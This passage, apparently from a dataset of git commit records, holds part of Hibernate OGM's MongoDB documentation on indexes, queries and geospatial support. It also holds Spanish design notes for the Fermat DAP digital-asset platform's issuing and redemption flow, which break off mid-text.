\"bankAccounts_id\" : \"account_1\",\n \"table\" : \"AccountOwner_BankAccount\"\n },\n\n \"rows\" : [ \"owner0001\" ]\n}\n{\n \"_id\" : {\n \"owners_id\" : \"owner0001\",\n \"table\" : \"AccountOwner_BankAccount\"\n },\n\n \"rows\" : [ \"account_1\" ]\n}\n----\n====\n\n[[ogm-mongodb-indexes-unique-constraints]]\n=== Indexes and unique constraints\n\n==== Standard indexes and unique constraints\n\nYou can create your index and unique constraints in MongoDB using the standard JPA annotations.\n\n.Creating indexes and unique constraints using JPA annotations\n====\n[source, JAVA]\n----\n@Entity\n@Table(indexes = {\n @Index(columnList = \"author, name\", name = \"author_name_idx\", unique = true),\n @Index(columnList = \"name DESC\", name = \"name_desc_idx\")\n})\npublic class Poem {\n\n @Id\n private String id;\n private String name;\n private String author;\n\n @Column(unique = true)\n private String url;\n\n \/\/ getters, setters ...\n}\n----\n====\n\n[NOTE]\n====\nMongoDB supports unique constraints via unique indexes. It considers `null` as a value to be unique: you can only\nhave one `null` value per unique index. This is not what is commonly accepted as the definition of a unique constraint in\nthe JPA world. 
Thus, by default, we create the unique indexes as `sparse`: such an index only covers defined values, so that the\nunique constraints accept multiple `null` values.\n====\n\n==== Using MongoDB specific index options\n\nMongoDB supports https:\/\/docs.mongodb.com\/manual\/reference\/method\/db.collection.createIndex\/[a number of options for\nindex creation].\n\nIt is possible to define them using the `@IndexOption` annotation.\n\n.Creating indexes with MongoDB specific options\n====\n[source, JAVA]\n----\n@Entity\n@Table(indexes = {\n @Index(columnList = \"author\", name = \"author_idx\")\n})\n@IndexOptions(\n @IndexOption(forIndex = \"author_idx\", options = \"{ background : true, sparse : true, partialFilterExpression : { author: 'Verlaine' } }\")\n)\npublic class Poem {\n\n @Id\n private String id;\n private String name;\n private String author;\n\n \/\/ getters, setters ...\n}\n----\n====\n\n`@IndexOption` simply passes the options to MongoDB at index creation: you can use every option available in MongoDB.\n\n==== Full text indexes\n\nMongoDB supports the ability to create one (and only one) full text index per collection.\n\nAs JPA does not support the ability to define `text` as an order in the `@Index` annotation (only `ASC` and `DESC`\nare supported), this ability has been included inside the `@IndexOption` mechanism. You simply need to add `text: true`\nto the options passed to MongoDB; Hibernate OGM interprets it and translates the index into a full text index.\n\n.Creating a full text index\n====\n[source, JAVA]\n----\n@Entity\n@Table(indexes = {\n @Index(columnList = \"author, name\", name = \"author_name_text_idx\")\n})\n@IndexOptions(\n @IndexOption(forIndex = \"author_name_text_idx\", options = \"{ text: true, default_language : 'fr', weights : { author: 2, name: 5 } }\")\n)\npublic class Poem {\n\n @Id\n private String id;\n private String name;\n private String author;\n\n \/\/ getters, setters ...\n}\n----\n====\n\n=== Transactions\n\nMongoDB does not support transactions.\nOnly changes applied to the same document are done atomically.\nA change applied to more than one document will not be applied atomically.\nThis problem is slightly mitigated by the fact that Hibernate OGM queues all changes\nbefore applying them during flush time.\nSo the window of time used to write to MongoDB is smaller than if you had applied the changes manually.\n\nWe recommend that you still use transaction demarcations with Hibernate OGM\nto trigger the flush operation transparently (on commit).\nBut do not consider rollback as a possibility: this won't work.\n\n[[ogm-mongodb-optimisticlocking]]\n=== Optimistic Locking\n\nMongoDB does not provide a built-in mechanism for detecting concurrent updates to the same document,\nbut it provides a way to execute atomic find and update operations.\nBy exploiting these commands, Hibernate OGM can detect concurrent modifications to the same document.\n\nYou can enable optimistic locking detection using the annotation `@Version`:\n\n.Optimistic locking detection via `@Version`\n====\n[source, JAVA]\n----\n@Entity\npublic class Planet implements Nameable {\n\n @Id\n private String id;\n private String name;\n\n @Version\n private int version;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"planet-1\",\n \"name\" : \"Pluto\",\n \"version\" : 0\n}\n----\n====\n\nThe `@Version` annotation defines which attribute will keep track of the version of the document.\nHibernate OGM will update the field when required, and if two changes from two different sessions (for 
example)\nare applied to the same document a `org.hibernate.StaleObjectStateException` is thrown.\n\nYou can use `@Column` to change the name of the field created on MongoDB:\n\n.Optimistic locking detection via `@Version` using `@Column`\n====\n[source, JAVA]\n----\n@Entity\npublic class Planet implements Nameable {\n\n @Id\n private String id;\n private String name;\n\n @Version\n @Column(name=\"OPTLOCK\")\n private int version;\n\n \/\/ getters, setters ...\n}\n----\n\n----\n{\n \"_id\" : \"planet-1\",\n \"name\" : \"Pluto\",\n \"OPTLOCK\" : 0\n}\n----\n====\n\n[[ogm-mongodb-queries]]\n=== Queries\n\nYou can express queries in a few different ways:\n\n* using JPQL\n* using a native MongoQL query\n* using a Hibernate Search query (brings advanced full-text and geospatial queries)\n\nWhile you can use JPQL for simple queries, you might hit limitations.\nThe current recommended approach is to use native MongoQL\nif your query involves nested (list of) elements.\n\nMongoDB doesn't require Hibernate Search to run queries.\n\n[NOTE]\n====\nIn order to reflect changes performed in the current session,\nall entities affected by a given query are flushed to the datastore prior to query execution\n(that's the case for Hibernate ORM as well as Hibernate OGM).\n\nFor not fully transactional stores such as MongoDB\nthis can cause changes to be written as a side-effect of running queries\nwhich cannot be reverted by a possible later rollback.\n\nDepending on your specific use cases and requirements you may prefer to disable auto-flushing,\ne.g. by invoking `query.setFlushMode( FlushMode.MANUAL )`.\nBear in mind though that query results will then not reflect changes applied within the current session.\n====\n\n==== JPQL queries\n\nHibernate OGM is a work in progress, so only a sub-set of JPQL constructs is available\nwhen using the JPQL query support. 
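For a flavor of what that sub-set already covers, here is a short sketch; it assumes the `Poem` entity used by the native query examples later in this section and uses only comparisons, `LIKE` and `ORDER BY`:\n\n[source, JAVA]\n----\n\/\/ A sketch using only constructs from the supported sub-set listed below.\nList<Poem> poems = em.createQuery(\n \"SELECT p FROM Poem p \"\n + \"WHERE p.author = 'Oscar Wilde' AND p.name LIKE 'A%' \"\n + \"ORDER BY p.name\", Poem.class )\n .getResultList();\n----\n\nAs mentioned, only a sub-set of JPQL is supported for now. 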
This includes:\n\n* simple comparisons using \"<\", \"+<=+\", \"=\", \">=\" and \">\"\n* `IS NULL` and `IS NOT NULL`\n* the boolean operators `AND`, `OR`, `NOT`\n* `LIKE`, `IN` and `BETWEEN`\n* `ORDER BY`\n* inner `JOIN` on embedded collections\n* projections of regular and embedded properties\n\nQueries using these constructs will be transformed into equivalent native MongoDB queries.\n\n[NOTE]\n====\nLet us know <<ogm-howtocontribute,by opening an issue or sending an email>>\nwhat query you wish to execute.\nExpanding our support in this area is high on our priority list.\n====\n\n[[ogm-mongodb-queries-native]]\n==== Native MongoDB queries\n\nHibernate OGM also supports certain forms of native queries for MongoDB.\nCurrently two forms of native queries are available via the MongoDB backend:\n\n* find queries specifying the search criteria only\n* queries specified using the MongoDB CLI syntax (<<ogm-mongodb-cli-syntax>>)\n\nThe former always maps results to entity types.\nThe latter either maps results to entity types or to certain supported forms of projection.\nNote that parameterized queries are not supported by MongoDB, so don't expect `Query#setParameter()` to work.\n\nYou can execute native queries as shown in the following example:\n\n.Using the JPA API\n====\n[source, JAVA]\n----\n@Entity\npublic class Poem {\n\n @Id\n private Long id;\n\n private String name;\n\n private String author;\n\n \/\/ getters, setters ...\n}\n\n...\n\njavax.persistence.EntityManager em = ...\n\n\/\/ criteria-only find syntax\nString query1 = \"{ $and: [ { name : 'Portia' }, { author : 'Oscar Wilde' } ] }\";\nPoem poem = (Poem) em.createNativeQuery( query1, Poem.class ).getSingleResult();\n\n\/\/ criteria-only find syntax with order-by\nString query2 = \"{ $query : { author : 'Oscar Wilde' }, $orderby : { name : 1 } }\";\nList<Poem> poems = em.createNativeQuery( query2, Poem.class ).getResultList();\n\n\/\/ projection via CLI-syntax\nString query3 = \"db.WILDE_POEM.find(\" +\n \"{ '$query' : { 'name' : 'Athanasia' }, '$orderby' : { 'name' : 1 } }\" +\n \"{ 'name' : 1 }\" +\n \")\";\n\n\/\/ will contain name and id as MongoDB always returns the id for projections\nList<Object[]> poemNames = (List<Object[]>)em.createNativeQuery( query3 ).getResultList();\n\n\/\/ projection via CLI-syntax\nString query4 = \"db.WILDE_POEM.count({ 'name' : 'Athanasia' })\";\n\nObject[] count = (Object[])em.createNativeQuery( query4 ).getSingleResult();\n----\n====\n\nThe result of a query is a managed entity (or a list thereof) or a projection of attributes in form of an object array,\njust like you would get from a JPQL query.\n\n.Using the Hibernate native API\n====\n[source, JAVA]\n----\nOgmSession session = ...\n\nString query1 = \"{ $and: [ { name : 'Portia' }, { author : 'Oscar Wilde' } ] }\";\nPoem poem = session.createNativeQuery( query1 )\n .addEntity( \"Poem\", Poem.class )\n .uniqueResult();\n\nString query2 = \"{ $query : { author : 'Oscar Wilde' }, $orderby : { name : 1 } }\";\nList<Poem> poems = session.createNativeQuery( query2 )\n .addEntity( \"Poem\", Poem.class )\n .list();\n----\n====\n\nNative queries can also be created using the `@NamedNativeQuery` annotation:\n\n.Using @NamedNativeQuery\n====\n[source, JAVA]\n----\n@Entity\n@NamedNativeQuery(\n name = \"AthanasiaPoem\",\n query = \"{ $and: [ { name : 'Athanasia' }, { author : 'Oscar Wilde' } ] }\",\n resultClass = Poem.class )\npublic class Poem { ... 
}\n\n...\n\n\/\/ Using the EntityManager\nPoem poem1 = (Poem) em.createNamedQuery( \"AthanasiaPoem\" )\n .getSingleResult();\n\n\/\/ Using the Session\nPoem poem2 = (Poem) session.getNamedQuery( \"AthanasiaPoem\" )\n .uniqueResult();\n----\n====\n\nHibernate OGM stores data in a natural way so you can still execute queries using the\nMongoDB driver, the main drawback is that the results are going to be raw MongoDB\ndocuments and not managed entities.\n\n[[ogm-mongodb-cli-syntax]]\n\n===== CLI Syntax\n\nHibernate OGM can execute native queries expressed using the MongoDB CLI syntax with some limitations.\nCurrently `find()`, `findOne()`, `findAndModify()`, and `count()` queries are supported. Furthermore, three\ntypes of write queries are supported via the CLI syntax: `insert()`, `remove()`, and `update()`. Other query\ntypes may be supported in future versions.\n\nAs one would expect, `find()`, `findOne()`, `findAndModify()`, `aggregate`,\n`distinct()`, and `count()` can be executed using\n`javax.persistence.Query.getSingleResult()` or `javax.persistence.Query.getResultList()`, while `insert()`,\n`remove()`, and `update()` require using `javax.persistence.Query.executeUpdate()`. Also note that,\n`javax.persistence.Query.executeUpdate()` may return `-1` in case execution of a query was not acknowledged\nrelative to the write concern used.\nVia `javax.persistence.Query.executeUpdate()` it is also possible to run `db.Collection.drop()`\nqueries.\n\n[NOTE]\n====\n`db.Collection.drop()` will always return 1. This is because the underlying driver we are\nusing doesn't return any value after the execution of the operation.\n====\n\n\nThe following functions can be used in the provided JSON:\n`BinData`, `Date`, `HexData`, `ISODate`, `NumberLong`, `ObjectId`, `Timestamp`,\n`RegExp`, `DBPointer`, `UUID`, `GUID`, `CSUUID`, `CSGUID`, `JUUID`, `JGUID`, `PYUUID`, `PYGUID`.\n\n[NOTE]\n====\n`NumberInt` is not supported as it is currently not supported by the MongoDB Java driver.\n====\n\nNo cursor operations such as `sort()` are supported.\nInstead use the corresponding MongoDB http:\/\/docs.mongodb.org\/manual\/reference\/operator\/query-modifier\/[query modifiers]\nsuch as `$orderby` within the criteria parameter.\n\nYou can limit the results of a query using the `setMaxResults(...)` method.\n\nJSON parameters passed via the CLI syntax must be specified using the\nhttp:\/\/docs.mongodb.org\/manual\/reference\/mongodb-extended-json\/[strict mode].\nSpecifically, keys need to be given within quotes; the only relaxation of this is that single quotes\nmay be used when specifying attribute names\/values to facilitate embedding queries within\nJava strings.\n\nNote that results of projections are returned as retrieved from the MongoDB driver at the moment and\nare not (yet) converted using suitable Hibernate OGM type implementations.\nThis requirement is tracked under https:\/\/hibernate.atlassian.net\/browse\/OGM-1031[OGM-1031].\n\n.CLI syntax examples\n====\n[source, JAVA]\n----\n\n\/\/ Valid syntax\nString valid = \"db.Poem.find({ \\\"name\\\" : \\\"Athanasia\\\" })\";\n\nString alsoValid = \"db.Poem.find({ '$or' : [{'name': 'Athanasia' }, {'name': 'Portia' }]})\";\n\nString validAggregation = \"db.Poem.aggregate([{ '$match': {'author': { '$regex': 'oscar.*', '$options': 'i' } } }, { '$sort': {'name': -1 } } ])\";\n\n\/\/ NOT Valid syntax, it will throw an exception: com.mongodb.util.JSONParseException\nString notValid = \"db.Poem.find({ name : \\\"Athanasia\\\" })\";\n\nString alsoNotValid = 
\"db.Poem.find({ $or : [{name: 'Athanasia' }, {name: 'Portia' }]})\";\n\n----\n====\n\n.CLI syntax sort and limit results alternatives\n====\n[source, JAVA]\n----\nString nativeQuery = \"db.Poem.find({ '$query': { 'author': 'Oscar Wilde' }, '$orderby' : { 'name' : 1 } })\";\n\n\/\/ Using hibernate session\nList<Poem> result = session.createNativeQuery( nativeQuery )\n\t.addEntity( Poem.class )\n\t.setMaxResults( 2 )\n\t.list();\n\n\/\/ Using JPA entity manager\nList<Poem> results = em.createNativeQuery( nativeQuery, Poem.class )\n\t.setMaxResults( 2 )\n\t.getResultList();\n----\n====\n\n.CLI syntax update examples\n====\n[source, JAVA]\n----\nString updateQuery = \"db.Poem.findAndModify({ 'query': {'_id': 1}, 'update': { '$set': { 'author': 'Oscar Wilde' } }, 'new': true })\";\nList<Poem> updated = session.createNativeQuery( updateQuery ).addEntity( Poem.class ).list();\n\nString insertQuery = \"db.Poem.insert({ '_id': { '$numberLong': '11' }, 'author': 'Oscar Wilder', 'name': 'The one and wildest', 'rating': '1' } )\";\nint inserted = session.createNativeQuery( insertQuery ).executeUpdate();\n\nString removeQuery = \"db.Poem.remove({ '_id': { '$numberLong': '11' } })\";\nint removed = session.createNativeQuery( removeQuery ).executeUpdate();\n----\n====\n\n[WARNING]\n====\nSupport for the `$regexp` operator is limited to the string syntax. We do not support the `\/pattern\/` syntax as it is not\ncurrently supported by the MongoDB Java driver.\n\n[source, JAVA]\n----\n\/\/ Valid syntax\nString nativeQuery = \"{ $query : { author : { $regex : '^Oscar' } }, $orderby : { name : 1 } }\";\nList<Poem> result = session.createNativeQuery( nativeQuery ).addEntity( Poem.class ).list();\n----\n====\n\n[[ogm-mongodb-stored-proc-native]]\n\n==== Server-side JavaScript and stored procedures\n\n[NOTE]\n====\nThis is an experimental feature.\n====\n\nIn MongoDB, it is possible to call server-side JavaScript as if it is a stored procedure.\nYou can use the existing methods in JPA:\n\n.Calling server-side JavaScript with positional parameters\n====\n[source, JAVA]\n----\n @Entity\n public class Car {\n @Id\n private Integer id;\n\n private String brand;\n\n ...\n }\n\n EntityManager em = ...\n StoredProcedureQuery storedProcedureQuery = em.createStoredProcedureQuery( \"findMostExpensiveCars\", Car.class );\n storedProcedureQuery.registerStoredProcedureParameter( \"year\", Integer.class, ParameterMode.IN );\n storedProcedureQuery.setParameter( \"year\", 1995 );\n List<Car> cars = storedProcedureQuery.getResultList();\n----\n====\n\nThis example will work assuming that there is a `findMostExpensiveCars` JavaScript function in MongoDB \nand that the result of the function is a list of cars that can be mapped to the `Car` entity.\n\n.Calling server-side JavaScript with Hibernate OGM with positional parameters\n====\n[source, JSON]\n----\n{\n \"result\" : [\n { \"id\":1, \"brand\":\"Bentley\" },\n { \"id\":2, \"brand\":\"Maserati\" },\n ]\n}\n----\n====\n\nMore details about server-side functions can be found in\nhttps:\/\/docs.mongodb.com\/manual\/core\/server-side-JavaScript[the MongoDB reference documentation].\n\n==== Hibernate Search\n\nYou can index your entities using Hibernate Search.\nThat way, a set of secondary indexes independent of MongoDB is maintained by Hibernate Search\nand you can run Lucene queries on top of them.\nThe benefit of this approach is a nice integration at the JPA \/ Hibernate API level\n(managed entities are returned by the queries).\nThe drawback is that you need to store the 
\n=== Geospatial support\n\n==== Geospatial fields\n\nOur MongoDB integration supports the ability to declare geospatial fields by using specific Java types that will be\nautomatically converted to GeoJSON objects stored in MongoDB.\n\nWe currently support the following types:\n\n * `GeoPoint`, stored as a GeoJSON Point\n * `GeoMultiPoint`, stored as a GeoJSON MultiPoint\n * `GeoLineString`, stored as a GeoJSON LineString\n * `GeoMultiLineString`, stored as a GeoJSON MultiLineString\n * `GeoPolygon`, stored as a GeoJSON Polygon\n * `GeoMultiPolygon`, stored as a GeoJSON MultiPolygon\n\nYou can find more information about these types and their constraints in the\nhttps:\/\/docs.mongodb.com\/manual\/reference\/geojson\/[MongoDB documentation].\n\n.Declaring a geospatial field\n====\n[source, JAVA]\n----\n@Entity\npublic class Restaurant {\n\n \/\/ [...]\n\n private GeoPoint location;\n}\n----\n====\n\nThese Java types come with handy constructors and helpers to make them easier to manipulate.\n\n.Instantiating a polygon\n====\n[source, JAVA]\n----\nGeoPolygon polygon = new GeoPolygon(\n new GeoPoint( 4.814922, 45.7753612 ),\n new GeoPoint( 4.8160825, 45.7327172 ),\n new GeoPoint( 4.9281299, 45.7211302 ),\n new GeoPoint( 4.8706127, 45.786724 ),\n new GeoPoint( 4.814922, 45.7753612 )\n);\n----\n====\n\n==== Geospatial indexes and queries\n\nTo be able to run optimized queries on geospatial fields, you need to declare spatial indexes.\n\nYou can leverage your usual annotations to declare the indexes directly on your entities.\n\n.Declaring a geospatial index\n====\n[source, JAVA]\n----\n@Entity\n@Table(indexes = {\n\t\t@Index(columnList = \"location\", name = \"location_spatial_idx\")\n})\n@IndexOptions(\n\t\t@IndexOption(forIndex = \"location_spatial_idx\", options = \"{ _type: '2dsphere' }\")\n)\npublic class Restaurant {\n\n \/\/ [...]\n\n private GeoPoint location;\n}\n----\n====\n\nNote that you need to specify the type of the index using an `@IndexOption` annotation.\n\nThe next step is to execute a geospatial query using a native query.\n\n.Finding entities around a point\n====\n[source, JAVA]\n----\nGeoPoint geoPoint = new GeoPoint( 4.8520035, 45.7498209 );\n\nQuery query = session\n .createNativeQuery( \"{ location: { $near: { $geometry: \" + geoPoint.toBsonDocument() + \", $maxDistance: 500 } } }\" )\n .addEntity( Restaurant.class );\nList<Restaurant> result = query.list();\n----\n====\n\n.Finding entities within a polygon\n====\n[source, JAVA]\n----\nGeoPolygon geoPolygon = new GeoPolygon(\n new GeoPoint( 4.814922, 45.7753612 ),\n new GeoPoint( 4.8160825, 45.7327172 ),\n new GeoPoint( 4.9281299, 45.7211302 ),\n new GeoPoint( 4.8706127, 45.786724 ),\n new GeoPoint( 4.814922, 45.7753612 )\n);\n\nQuery query = session\n .createNativeQuery( \"{ location: { $geoWithin: { $geometry: \" + geoPolygon.toBsonDocument() + \" } } }\" )\n .addEntity( Restaurant.class );\nList<Restaurant> result = query.list();\n----\n====\n\nTo learn more about MongoDB spatial indexes and queries, please refer to the\nhttps:\/\/docs.mongodb.com\/manual\/geospatial-queries\/[MongoDB documentation].\n","returncode":0,"stderr":"","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"fd28b6633f390a1e8fc4f002f1e7065b99b094b8","subject":"Documentacion DAP","message":"Documentacion 
DAP\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/fermat_dap\/flujo_general\/version1.asciidoc","new_file":"fermat-documentation\/fermat_dap\/flujo_general\/version1.asciidoc","new_contents":"[line-through]#[[flujo-general-BitDubai-V1]]\n\n= Flujo General de la Plataform DAP\n\n= Flujo Desarrollo\n\nEl flujo de desarrollo del Asset describe lo necesario para generar un Digital Asset.\nEl objeto DigitalAsset de la plataforma, contar\u00e1 con las siguientes propiedades:\n\n * Identity Asset Issuer: Identity del Actor AssetIssuer\n * String name: nombre del Asset definido por el issuer.\n * String description: descripci\u00f3n del asset definido por el issuer.\n * List<Resource>: lista de recursos posibles del asset, como por ejemplo im\u00e1genes, videos, etc.\n * String GenesisTransaction: hash de la transacci\u00edn bitcoin donde el asset est\u00e1 incluido.\n * Address GenesisAddress: direcci\u00f3n Genesis generada por la Asset Vault\n * long GenesisAmount: valor crypto del digital asset en Satoshis.\n\nComo contrato b\u00e1sico para el Digital Asset para poder cerrar el ciclo en el desarrollo inicial de la plataforma,\nespecificaremos que:\n\n * Redimible\n * ExpirationDate: fecha de expiraci\u00f3n que puede ser nunca.\n\nUna vez completadas estas propiedades por parte del Issuer, y cerrado y decidido a crear el Digital Asset sin m\u00e1s cambios,\nla Asset Issuer subApp, inicia una Digital Asset Transaction de Asset Issuing en la que lo siguiente ocurre:\n\n* Se solicita a la Crypto Vault la creaci\u00f3n de una transaction bitcoin la cual devuelve un hash. Este hash se define como la GenesisTransaction\nen el Digital Asset.\n* Se solicita a la Asset Vault una direcci\u00f3n bitcoin que ser\u00e1 la GenesisAddress\n* Se completa la crypto transacci\u00f3n especificando el GenesisAmount.\n* Se ejecuta un hash del Digital Asset y el mismo se coloca en el OP_OUTPUT de la crypto transacci\u00f3n.\n* Se commitea la transacci\u00f3n y la misma es publicada a la red de bitcoin a trav\u00e9s de la Crypto Network.\n* El Digital Asset es considerado creado y cerrado.\n\n\n[Manuel completar m\u00e1s info de la transacci\u00f3n]\n\nRealizadas estas operaciones, y al momento de recibir el GenesisAmount en la Asset Vault, las operaciones de cr\u00e9dito dentro de la\nAsset Wallet deben ocurrir.\n\n * Registro en Asset Issuer Wallet\n\nEs importante mencionar que este proceso realizara una transaccion contable al Asset del Issuer, aumentando la cantidad de Asset originado por el Asset en su creacion,\npara que cuando sea enviado a un Asset User, le sea debitado dicho asset a la wallet Issuet y acreditados a la walletAsset User, de esta forma podriamos conocer cuantos Asset de ese tipo\nhan sido creados y estan disponible para su envio, todo esta operacion debe ser originado mediante una transaccion de la capa transaction.\n\n* Registro en Asset User Wallet\n\nEste proceso realizara una transaccion contable a la wallet Asset del User, aumentando la cantidad de Asset User enviado por el Asset Issuer, y acreditando dicho asset a la wallet Issuet,\nde esta forma podriamos conocer cuantos Asset de ese tipo tiene disponible el Aset User para su intercambio, todo esta operacion debe ser originado mediante una transaccion\nde la capa transaction.\n\n* Registro en Redeem Point Wallet\n\nEste proceso determina el intercambio de la wallet Asset User donde mediante un metodo donde se pase las direcciones correspondiente se realizara una transaccion 
contable a la Asset del User, disminuyendo la cantidad de la wallet Asset User,\ny acreditando o retornando dicho asset a la Asset Issuer en punto Reddem Point o en alguna wallet que determine la Redemcion.\nAclarar que pasa con este Asset si se puede volver a enviar.\nUna vez verificada la genesis transaction por parte del Redeem Point, se debe notificar al plugin Outgoing Issuer que debe realizar la transferencia del monto crypto asociado\na la genesis transaction hac\u00eda el dispositivo que va a recibir el digital asset para su \"redemci\u00f3n\". Una vez que se produzca la transferencia del monto del Digital Asset\nel dispositivo del beneficiero del asset debe proceder a registrar el consumo del mencionado Asset y proceder a su inhabilitaci\u00f3n (\u00bf?) del dispositivo y registrarlo como consumido.\n\n\n\n= Funciones del Asset Issuing\n\nEl plugin Asset Issuing ser\u00e1 el encargado de la creaci\u00f3n de los Assets, incluyendo metadata y crypto monto, que posteriormente ser\u00e1n enviados a los posibles destinatarios de los Digital Assets. Este plugin\ndeber\u00e1 solicitar la genesis transaction, la cual se define como la transacci\u00f3n origen de los crypto montos a ser transferidos junto al asset, as\u00ed mismo, debe solicitar\nla genesis address, la cual se define como la direcci\u00f3n que emiti\u00f3 el Asset. Una vez obtenida la informaci\u00f3n antes mencionada, este plugin debe crear las transacciones que\npermitan la transferencia de los Assets a los destinatarios. Este plugin debe ser responsable de cada uno de los Assets generados hasta que todos hayan sido entregados a los\ndestinatarios. Este plugin debe tener la capacidad de monitorear que Asset ha sido entregado y registrarlo (aun no veo donde) para su posterior consumo. Si un asset no ha\nsido registrado como entregado por este plugin, ese Asset no deber\u00eda ser consumido por el beneficiario.\nEstos Assets pueden ser enviados a cualquier tipo de wallet, es decir, debe ser transparente para este plugin los destinatarios de los assets, la metadata que se entrega a\n este plugin debe incluir la informaci\u00f3n que permita discriminar a que tipo de wallet\/destinatario va dirigido el Asset, este proceso de filtrado podr\u00eda tomarse de las wallets\n instaladas actualmente, este plugin debe recibir de una capa superior el criterio de selecci\u00f3n de los destinatarios, de tal forma que este pueda crear la transaci\u00f3n que permita\n enviar el asset al destinatario.\nLos Assets que no se hayan enviado deben permanecer en el dispositivo emisor hasta que el beneficiario haya autorizado la instalaci\u00f3n\/descarga del digital asset\na su dispositivo. Al momento de instalaci\u00f3n del Asset en el dispositivo destino es que se debe realizar la trasferencia del crypto monto al dispositivo destino.\nLos crypto montos del emisor asociados a cada assets deben estar reservados en el dispositivo emisor hasta que sean transferidos a los beneficiarios. 
Estos montos no deben\ncambiar una vez reservados.\n\n*Preguntar al team:*\n\u00bfEs posible que el emisor elimine\/cancele un asset a discreci\u00f3n?\n\n= Transferencia y confirmaci\u00f3n de Asset a beneficiario\n\n= Notificaci\u00f3n en Incoming Issuer\n\nEl plugin Incoming Issuer en el lado del consumidor o beneficiario ser\u00e1 el encargado de monitorear la existencia de un Digital Asset (de alguna manera, por definir) que est\u00e9 dirigido para la Asset Wallet del usuario,\nen caso de recibir la notificaci\u00f3n de la existencia de un Digital Asset, este plugin deber\u00e1 verificar la metadata que debe estar incluida en el Asset, esta comprobaci\u00f3n debe\nincluir la verificaci\u00f3n de la genesis Transaction, con lo cual se puede verificar el origen del Asset.\nUna vez verificado el origen del Asset, el plugin debe lanzar\u00e1 una notificaci\u00f3n a una capa superior para que el usuario est\u00e9 en cuenta de la existencia de este Asset.\nEs de hacer notar que hasta el momento, se piensa que el usuario va a autorizar si el Asset va a ser descargado en el dispositivo, esto podr\u00eda cambiar en un futuro,\nya que se plantea que este Asset puede estar \"pre-instalado\" en el dispositivo. Se podr\u00eda definir varias posibles condiciones de descarga de un Asset:\n * descargable autom\u00e1ticamente (el Issuer la instala autom\u00e1ticamente en las Asset Wallets destino)\n * descargable por autorizaci\u00f3n del usuario.\n * preinstalada en la Asset Wallet.\nUna vez que la Asset Wallet autoriza la instalaci\u00f3n o descarga del Digital Asset, se procede a crear la transacci\u00f3n que va a transferir el monto crypto asociado a la metadata\nde la genesis transaction a la Asset Vault del destinatario. Una vez realizada correctamente la transferencia de fondos, se debe notificar a las capas que controlan la UI la\ncorrecta instalaci\u00f3n\/descarga del Asset.\n\n*Preguntar al team*:\n\u00bfUn asset puede ser descargado o instalado por alg\u00fan otro medio distinto a la red de fermat? \u00bfSe podr\u00eda recibir v\u00eda c\u00f3digo QR?\n\n\n#","old_contents":"[line-through]#[[flujo-general-BitDubai-V1]]\n\n= Flujo General de la Plataform DAP\n\n\nEl actor ISSUER procede a crear el Asset donde colocara la informacion relevante:\n\n * Tienen un Emisor, que es alguno de los actores del sistema.\n * Tienen una fecha de expiraci\u00f3n. (aunque en algunos casos puede ser que no expiren nunca)\n * Tienen uno o mas elementos multi-media (imagen, sonido, video, animaci\u00f3n, etc.) destinados a\n representar ante el usuario final dicho asset.\n * Son de un determinado tipo.\n * Pueden ser redimido.\n * Tienen una lista de condiciones que dependen de su tipo. (Las entienden cualquier wallet que maneje\n ese tipo de Assets)\n * Son de un determinado sub-tipo.\n * Tienen una lista de condiciones que dependen de su sub-tipo. (Las entienden cualquier wallet que\n maneje ese sub-tipo de Assets)\n * Tienen una lista de condiciones que dependen de su emisor. 
(Solo las entienden las wallets del emisor)\n\nEl Issuer determinara en que momento el Asset estara disponible para su envio o publicacion a las Wallets\ninstaladas en otros dispositivos y de manera asincrona comenzara la instalacion del Asset, siempre y\ncuando se haya validado algunas informacion tecnica del Asset, por ejemplo que no haya caducado,\nel actor User, debera de una manera aceptar\nel Asset recibido.\n\nDeberiamos de buscar la manera de saber el codigo de la billetera para proceder a enviar el asset.\n\nInteracion y Flujo de pluggin, subapp, explicacion.\n\n= Flujo Desarrollo\n\nEl flujo de desarrollo del Asset describe lo necesario para generar un Digital Asset.\nEl objeto DigitalAsset de la plataforma, contar\u00e1 con las siguientes propiedades:\n\n * Identity Asset Issuer: Identity del Actor AssetIssuer\n * String name: nombre del Asset definido por el issuer.\n * String description: descripci\u00f3n del asset definido por el issuer.\n * List<Resource>: lista de recursos posibles del asset, como por ejemplo im\u00e1genes, videos, etc.\n * String GenesisTransaction: hash de la transacci\u00edn bitcoin donde el asset est\u00e1 incluido.\n * Address GenesisAddress: direcci\u00f3n Genesis generada por la Asset Vault\n * long GenesisAmount: valor crypto del digital asset en Satoshis.\n\nComo contrato b\u00e1sico para el Digital Asset para poder cerrar el ciclo en el desarrollo inicial de la plataforma,\nespecificaremos que:\n\n * Redimible\n * ExpirationDate: fecha de expiraci\u00f3n que puede ser nunca.\n\nUna vez completadas estas propiedades por parte del Issuer, y cerrado y decidido a crear el Digital Asset sin m\u00e1s cambios,\nla Asset Issuer subApp, inicia una Digital Asset Transaction de Asset Issuing en la que lo siguiente ocurre:\n\n* Se solicita a la Crypto Vault la creaci\u00f3n de una transaction bitcoin la cual devuelve un hash. 
Este hash se define como la GenesisTransaction\nen el Digital Asset.\n* Se solicita a la Asset Vault una direcci\u00f3n bitcoin que ser\u00e1 la GenesisAddress\n* Se completa la crypto transacci\u00f3n especificando el GenesisAmount.\n* Se ejecuta un hash del Digital Asset y el mismo se coloca en el OP_OUTPUT de la crypto transacci\u00f3n.\n* Se commitea la transacci\u00f3n y la misma es publicada a la red de bitcoin a trav\u00e9s de la Crypto Network.\n* El Digital Asset es considerado creado y cerrado.\n\n\n[Manuel completar m\u00e1s info de la transacci\u00f3n]\n\nRealizadas estas operaciones, y al momento de recibir el GenesisAmount en la Asset Vault, las operaciones de cr\u00e9dito dentro de la\nAsset Wallet deben ocurrir.\n\n * Registro en Asset Issuer Wallet\n\nEs importante mencionar que este proceso realizara una transaccion contable al Asset del Issuer, aumentando la cantidad de Asset originado por el Asset en su creacion,\npara que cuando sea enviado a un Asset User, le sea debitado dicho asset a la wallet Issuet y acreditados a la walletAsset User, de esta forma podriamos conocer cuantos Asset de ese tipo\nhan sido creados y estan disponible para su envio, todo esta operacion debe ser originado mediante una transaccion de la capa transaction.\n\n* Registro en Asset User Wallet\n\nEste proceso realizara una transaccion contable a la wallet Asset del User, aumentando la cantidad de Asset User enviado por el Asset Issuer, y acreditando dicho asset a la wallet 